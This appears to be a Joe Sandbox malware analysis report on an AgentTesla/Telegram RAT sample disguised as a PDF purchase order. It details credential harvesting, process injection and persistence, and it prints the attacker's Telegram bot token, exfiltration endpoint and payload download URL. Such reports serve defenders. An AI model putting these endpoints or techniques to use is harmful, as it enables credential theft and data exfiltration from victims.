                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Afoagcjtqvi.exe.4256f68.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Afoagcjtqvi.exe.4256f68.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3bd9550.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3d35080.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3ce6860.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1887638572.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1912263833.00000000042F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1753923605.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1886274961.0000000000602000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1970737045.000000000254C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1995281539.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1890943123.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RFQ__PO_PO 24090041-PDF____PDF.exe PID: 6204, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4008, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Afoagcjtqvi.exe PID: 6192, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 344, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Afoagcjtqvi.exe PID: 824, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7012, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Afoagcjtqvi.exe.4256f68.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Afoagcjtqvi.exe.4256f68.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3bd9550.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3d35080.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3ce6860.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2973425919.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1970737045.000000000258E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1890943123.00000000025E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2973425919.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1887638572.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1912263833.00000000042F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1890943123.00000000025CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1753923605.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1886274961.0000000000602000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1970737045.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2973425919.000000000281A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1970737045.000000000254C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1995281539.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1890943123.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RFQ__PO_PO 24090041-PDF____PDF.exe PID: 6204, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4008, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Afoagcjtqvi.exe PID: 6192, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 344, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Afoagcjtqvi.exe PID: 824, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7012, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Afoagcjtqvi.exe.4256f68.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Afoagcjtqvi.exe.4256f68.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3bd9550.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3d35080.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3ce6860.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1887638572.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1912263833.00000000042F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2973425919.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1753923605.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1886274961.0000000000602000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1970737045.000000000254C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1995281539.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1890943123.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RFQ__PO_PO 24090041-PDF____PDF.exe PID: 6204, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4008, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Afoagcjtqvi.exe PID: 6192, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 344, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Afoagcjtqvi.exe PID: 824, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7012, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services1
                      Archive Collected Data                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts2
                      Command and Scripting Interpreter                      		1
                      Scheduled Task/Job                      		211
                      Process Injection                      		2
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		24
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		1
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Scheduled Task/Job                      		1
                      Registry Run Keys / Startup Folder                      		1
                      Scheduled Task/Job                      		1
                      Software Packing                      		Security Account Manager311
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		11
                      Encrypted Channel                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Registry Run Keys / Startup Folder                      		1
                      DLL Side-Loading                      		NTDS12
                      Virtualization/Sandbox Evasion                      		Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Masquerading                      		LSA Secrets1
                      Process Discovery                      		SSHKeylogging4
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                      Virtualization/Sandbox Evasion                      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
                      Process Injection                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525395 Sample: RFQ__PO_PO 24090041-PDF____... Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 30 api.telegram.org 2->30 32 wymascensores.com 2->32 46 Multi AV Scanner detection for domain / URL 2->46 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 54 12 other signatures 2->54 7 RFQ__PO_PO 24090041-PDF____PDF.exe 16 4 2->7         started        12 Afoagcjtqvi.exe 14 2 2->12         started        14 Afoagcjtqvi.exe 2->14         started        signatures3 52 Uses the Telegram API (likely for C&C communication) 30->52 process4 dnsIp5 34 wymascensores.com 67.212.175.162, 443, 49730, 49732 SINGLEHOP-LLCUS United States 7->34 24 C:\Users\user\AppData\...\Afoagcjtqvi.exe, PE32 7->24 dropped 26 C:\Users\...\Afoagcjtqvi.exe:Zone.Identifier, ASCII 7->26 dropped 56 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->56 58 Writes to foreign memory regions 7->58 60 Injects a PE file into a foreign processes 7->60 16 InstallUtil.exe 14 2 7->16         started        62 Antivirus detection for dropped file 12->62 64 Multi AV Scanner detection for dropped file 12->64 66 Machine Learning detection for dropped file 12->66 20 InstallUtil.exe 2 12->20         started        22 InstallUtil.exe 14->22         started        file6 signatures7 process8 dnsIp9 28 api.telegram.org 149.154.167.220, 443, 49731, 49734 TELEGRAMRU United Kingdom 16->28 36 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->36 38 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->38 40 Tries to steal Mail credentials (via file / registry access) 22->40 42 Tries to harvest and steal ftp login credentials 22->42 44 Tries to harvest and steal browser information (history, passwords, etc) 22->44 signatures10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      RFQ__PO_PO 24090041-PDF____PDF.exe34%ReversingLabsByteCode-MSIL.Trojan.Generic
                      RFQ__PO_PO 24090041-PDF____PDF.exe25%VirustotalBrowse
                      RFQ__PO_PO 24090041-PDF____PDF.exe100%AviraHEUR/AGEN.1310836
                      RFQ__PO_PO 24090041-PDF____PDF.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe100%AviraHEUR/AGEN.1310836
                      C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe34%ReversingLabsByteCode-MSIL.Trojan.Generic
                      C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe25%VirustotalBrowse

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      wymascensores.com11%VirustotalBrowse
                      api.telegram.org2%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                      https://account.dyn.com/0%URL Reputationsafe
                      https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                      https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      https://github.com/mgravell/protobuf-netJ0%VirustotalBrowse
                      https://github.com/mgravell/protobuf-neti0%VirustotalBrowse
                      https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument1%VirustotalBrowse
                      https://api.telegram.org1%VirustotalBrowse
                      https://wymascensores.com/rigasin/Chody.mp39%VirustotalBrowse
                      https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/1%VirustotalBrowse
                      https://wymascensores.com/rigasin/Chody.mp31PDOh7YFOr1sSh49%VirustotalBrowse
                      http://api.telegram.org2%VirustotalBrowse
                      https://wymascensores.com6%VirustotalBrowse
                      https://github.com/mgravell/protobuf-net0%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      wymascensores.com
                      		67.212.175.162
                      		truefalseunknown
                      api.telegram.org
                      		149.154.167.220
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocumenttrueunknown
                      https://wymascensores.com/rigasin/Chody.mp3trueunknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://github.com/mgravell/protobuf-netiRFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                      https://stackoverflow.com/q/14436606/23354RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.0000000003138000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://account.dyn.com/RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1886274961.0000000000602000.00000040.00000400.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.00000000042F1000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1995281539.0000000003E70000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://api.telegram.orgInstallUtil.exe, 00000001.00000002.1890943123.00000000025D6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1970737045.0000000002596000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2973425919.0000000002806000.00000004.00000800.00020000.00000000.sdmptrueunknown
                      https://github.com/mgravell/protobuf-netJRFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                      https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1886274961.0000000000602000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1890943123.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.00000000042F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1970737045.000000000254C000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1995281539.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2973425919.00000000027BC000.00000004.00000800.00020000.00000000.sdmptrueunknown
                      https://stackoverflow.com/q/11564914/23354;RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://stackoverflow.com/q/2152978/23354RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://github.com/mgravell/protobuf-netRFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                      https://wymascensores.com/rigasin/Chody.mp31PDOh7YFOr1sSh4RFQ__PO_PO 24090041-PDF____PDF.exe, Afoagcjtqvi.exe.0.drtrueunknown
                      http://api.telegram.orgInstallUtil.exe, 00000001.00000002.1890943123.00000000025E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1970737045.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2973425919.000000000281A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://wymascensores.comRFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002C7C000.00000004.00000800.00020000.00000000.sdmptrueunknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1890943123.00000000025D6000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1970737045.0000000002596000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2973425919.0000000002806000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      149.154.167.220
                      		api.telegram.orgUnited Kingdom
                      		62041TELEGRAMRUtrue
                      67.212.175.162
                      		wymascensores.comUnited States
                      		32475SINGLEHOP-LLCUSfalse

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1525395
                      Start date and time:2024-10-04 06:21:05 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 8m 55s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:10
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:RFQ__PO_PO 24090041-PDF____PDF.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@9/2@2/2
                      EGA Information:
                      • Successful, ratio: 83.3%
                      HCA Information:
                      • Successful, ratio: 94%
                      • Number of executed functions: 510
                      • Number of non-executed functions: 37
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target InstallUtil.exe, PID 7012 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      05:22:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Afoagcjtqvi C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe
                      05:22:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Afoagcjtqvi C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      149.154.167.220enigma.tech.exeGet hashmaliciousBlank GrabberBrowse
                        1.cmdGet hashmaliciousUnknownBrowse
                          2.cmdGet hashmaliciousUnknownBrowse
